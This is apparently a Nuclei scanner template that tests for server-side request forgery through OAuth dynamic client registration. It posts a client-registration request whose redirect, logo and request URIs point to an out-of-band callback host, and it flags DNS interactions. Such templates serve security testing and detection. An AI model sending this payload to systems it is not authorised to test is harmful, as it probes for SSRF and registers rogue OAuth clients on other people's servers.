id: ssrf-via-oauth-misconfig

info:
  name: SSRF due to misconfiguration in OAuth
  author: KabirSuda
  severity: medium
  description: Sends a POST request with the endpoint "/connect/register" to check external Interaction with multiple POST parameters.
  tags: misconfig,oob,oauth
  reference: https://portswigger.net/research/hidden-oauth-attack-vectors

requests:
  - raw:
      - |
        POST /connect/register HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
        Accept-Language: en-US,en;q=0.9
        Connection: close

        {
          "application_type": "web",
          "redirect_uris": ["https://{{interactsh-url}}/callback"],
          "client_name": "{{Hostname}}",
          "logo_uri": "https://{{interactsh-url}}/favicon.ico",
          "subject_type": "pairwise",
          "token_endpoint_auth_method": "client_secret_basic",
          "request_uris": ["https://{{interactsh-url}}"]
        }

    matchers:
      - type: word
        part: interactsh_protocol  # Confirms the DNS Interaction
        words:
          - "dns"